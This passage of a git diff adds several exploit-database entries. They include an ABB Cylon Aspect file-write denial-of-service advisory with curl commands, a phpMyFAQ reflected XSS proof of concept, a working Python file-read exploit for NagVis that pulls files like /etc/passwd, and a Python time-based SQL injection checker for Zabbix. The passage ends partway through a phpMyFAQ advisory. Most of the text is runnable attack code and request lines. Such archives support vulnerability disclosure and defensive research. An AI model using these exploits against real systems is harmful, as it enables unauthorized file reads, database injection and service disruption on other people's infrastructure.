+ ___ | | |. |' .---"|
+ _ .-' '-. | | .--'| || | _| |
+ .-'| _.| | || '-__ | | | || |
+ |' | |. | || | | | | || |
+ ____| '-' ' "" '-' '-.' '` |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+$ http://192.168.73.31/factorySaved.php?title=
\ No newline at end of file
diff --git a/exploits/php/hardware/52234.txt b/exploits/php/hardware/52234.txt
new file mode 100644
index 000000000..c4d793081
--- /dev/null
+++ b/exploits/php/hardware/52234.txt
@@ -0,0 +1,83 @@
+# Exploit title: ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) File Write DoS
+# Vendor: ABB Ltd.
+# Product web page: https://www.global.abb
+# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+ Firmware: <=3.08.03
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
+arbitrary content injection vulnerability in the webServerDeviceLabelUpdate.php
+script due to a lack of input validation. Authenticated attackers can exploit
+the 'deviceLabel' POST parameter to write arbitrary content to a fixed file
+location at /usr/local/aam/etc/deviceLabel, potentially causing a denial of
+service.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+ GNU/Linux 3.10.0 (x86_64)
+ GNU/Linux 2.6.32 (x86_64)
+ Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+ Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+ PHP/7.3.11
+ PHP/5.6.30
+ PHP/5.4.16
+ PHP/4.4.8
+ PHP/5.3.3
+ AspectFT Automation Application Server
+ lighttpd/1.4.32
+ lighttpd/1.4.18
+ Apache/2.2.15 (CentOS)
+ OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+ OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+ ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2025-5892
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5892.php
+
+
+21.04.2024
+
+--
+
+
+$ cat project
+
+ P R O J E C T
+
+ .|
+ | |
+ |'| ._____
+ ___ | | |. |' .---"|
+ _ .-' '-. | | .--'| || | _| |
+ .-'| _.| | || '-__ | | | || |
+ |' | |. | || | | | | || |
+ ____| '-' ' "" '-' '-.' '` |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+$ curl http://192.168.73.31/webServerDeviceLabelUpdate.php \
+> -H "Cookie: PHPSESSID=xxx" \
+> -d "deviceLabel=`printf '%.0sA' {1..10000}`"\
+> # --data-urlencode "deviceLabel@largecontent.txt"
+
+$ curl http://192.168.73.31/webServerConfiguration.php | grep AAA
\ No newline at end of file
diff --git a/exploits/php/webapps/52226.txt b/exploits/php/webapps/52226.txt
new file mode 100644
index 000000000..35793801d
--- /dev/null
+++ b/exploits/php/webapps/52226.txt
@@ -0,0 +1,28 @@
+# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
+# Date: 2024-10-26
+# Exploit Author: CodeSecLab
+# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
+# Software Link: https://github.com/thorsten/phpMyFAQ
+# Version: 3.1.7
+# Tested on: Ubuntu Windows
+# CVE : CVE-2022-4407
+
+PoC:
+Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\">
+
+Details:
+{
+ "Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
+ "Vulnerable Variable": "action",
+ "Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
+ "Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
+ "Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
+ "Attack Payload": "\">",
+ "Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
+ "Request Parameters": "action",
+ "Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\">",
+ "Request Method": "GET",
+ "Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\">"
+}
+
+[Replace Your Domain Name]
\ No newline at end of file
diff --git a/exploits/php/webapps/52229.py b/exploits/php/webapps/52229.py
new file mode 100755
index 000000000..4eaa2734e
--- /dev/null
+++ b/exploits/php/webapps/52229.py
@@ -0,0 +1,74 @@
+# Exploit Title: NagVis 1.9.33 - Arbitrary File Read
+# Date: 03/12/2024
+# Exploit Author: David Rodríguez a.k.a. xerosec
+# Vendor Homepage: https://www.nagvis.org/
+# Software Link: https://www.nagvis.org/downloads/archive
+# Version: 1.9.33
+# Tested on: Linux
+# CVE: CVE-2022-46945
+
+import requests
+import argparse
+import json
+from urllib.parse import urljoin
+
+def authenticate(target_url, username, password):
+ url = urljoin(target_url, '/nagvis/frontend/nagvis-js/index.php')
+ headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
+ data = {"_username": username, "_password": password, "submit": "Login"}
+
+ try:
+ response = requests.post(url, headers=headers, data=data)
+ if response.status_code == 200 and "Set-Cookie" in response.headers:
+ print("[✔] Authentication successful.")
+ return response.headers["Set-Cookie"]
+ print(f"[✘] Authentication failed. Status code: {response.status_code}")
+ except Exception as e:
+ print(f"[✘] Request error: {e}")
+ return None
+
+def exploit(target_url, session_cookie, file_path):
+ url = urljoin(target_url, '/nagvis/server/core/ajax_handler.php')
+ headers = {"User-Agent": "Mozilla/5.0", "Cookie": session_cookie}
+ params = {"mod": "General", "act": "getHoverUrl", "url[]": f"file://{file_path}"}
+
+ try:
+ response = requests.get(url, headers=headers, params=params)
+ if response.status_code == 200:
+ print("[✔] Exploitation successful. File content:\n")
+ display_file_content(response.text)
+ else:
+ print(f"[✘] Exploitation failed. Status code: {response.status_code}")
+ except Exception as e:
+ print(f"[✘] Request error: {e}")
+
+def display_file_content(raw_response):
+ try:
+ data = json.loads(raw_response)
+ if isinstance(data, list) and len(data) > 0 and isinstance(data[0], dict) and "code" in data[0]:
+ content = data[0]["code"]
+ # Decodificar escapes de manera segura
+ content = content.encode('utf-8').decode('unicode_escape')
+ print(content.strip())
+ else:
+ print("[✘] Unexpected JSON structure.")
+ except json.JSONDecodeError as jde:
+ print(f"[✘] JSON decoding error: {jde}")
+ except Exception as e:
+ print(f"[✘] Unexpected error during output processing: {e}")
+
+def main():
+ parser = argparse.ArgumentParser(description="Exploit for CVE-2022-46945 (File Read Vulnerability)")
+ parser.add_argument("-t", "--target", required=True, help="Target base URL (e.g., http://10.0.2.132)")
+ parser.add_argument("-u", "--username", required=True, help="Username for authentication")
+ parser.add_argument("-p", "--password", required=True, help="Password for authentication")
+ parser.add_argument("-f", "--file", required=True, help="File path to read (e.g., /etc/passwd)")
+
+ args = parser.parse_args()
+
+ session_cookie = authenticate(args.target, args.username, args.password)
+ if session_cookie:
+ exploit(args.target, session_cookie, args.file)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/52230.py b/exploits/php/webapps/52230.py
new file mode 100755
index 000000000..879f9db8b
--- /dev/null
+++ b/exploits/php/webapps/52230.py
@@ -0,0 +1,63 @@
+# Exploit Title: Zabbix 7.0.0 - SQL Injection
+# Date: 06/12/2024
+# Exploit Author: Leandro Dias Barata @m4nb4
+# Vendor Homepage: https://www.zabbix.com/
+# Software Link: https://support.zabbix.com/browse/ZBX-25623
+# Version: 6.0.0 - 6.0.31 / 6.0.32rc1 6.4.0 - 6.4.16 / 6.4.17rc1 7.0.0
+# Tested on: Kali Linux kali-linux-2024.3
+# CVE: CVE-2024-42327
+
+import requests
+import argparse
+
+HEADERS = {"Content-Type": "application/json"}
+
+def main():
+ parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327")
+ parser.add_argument("-t", "--target", required=True, help="API URL")
+ parser.add_argument("-u", "--username", required=True, help="Username")
+ parser.add_argument("-p", "--password", required=True, help="Password")
+
+ args = parser.parse_args()
+
+ url = f"{args.target.rstrip('/')}/api_jsonrpc.php"
+
+ # Login to get the token
+ login_data = {
+ "jsonrpc": "2.0",
+ "method": "user.login",
+ "params": {"username": args.username, "password": args.password},
+ "id": 1,
+ "auth": None
+ }
+
+ try:
+ login_response = requests.post(url, json=login_data, headers=HEADERS)
+ login_response.raise_for_status()
+ auth_token = login_response.json().get("result")
+
+ # Simple SQLi test
+ data = {
+ "jsonrpc": "2.0",
+ "method": "user.get",
+ "params": {
+ "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
+ "userids": ["1", "2"]
+ },
+ "id": 1,
+ "auth": auth_token
+ }
+
+ test_response = requests.post(url, json=data, headers=HEADERS)
+ test_response.raise_for_status()
+
+ if "error" in test_response.text:
+ print("[-] NOT VULNERABLE.")
+ else:
+ print("[!] VULNERABLE.")
+
+ except requests.RequestException as e:
+ print(f"[!] Request error: {e}")
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/52235.txt b/exploits/php/webapps/52235.txt
new file mode 100644
index 000000000..0e7ad34b1
--- /dev/null
+++ b/exploits/php/webapps/52235.txt
@@ -0,0 +1,45 @@
+# Exploit Title: phpMyFAQ v3.2.10 - Unintended File Download Triggered by Embedded Frames
+# Date: 13 Dec 2024
+# Exploit Author: George Chen
+# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
+# Software Link: https://github.com/thorsten/phpMyFAQ/
+# Version: v3.2.10
+# Tested on: Mac, Win
+# CVE : CVE-2024–55889
+
+
+*Summary*
+A vulnerability exists in the FAQ Record component of
+https://github.com/thorsten/phpMyFAQ v3.2.10 where a privileged attacker
+can trigger a file download on a victim’s machine upon page visit by
+embedding it in an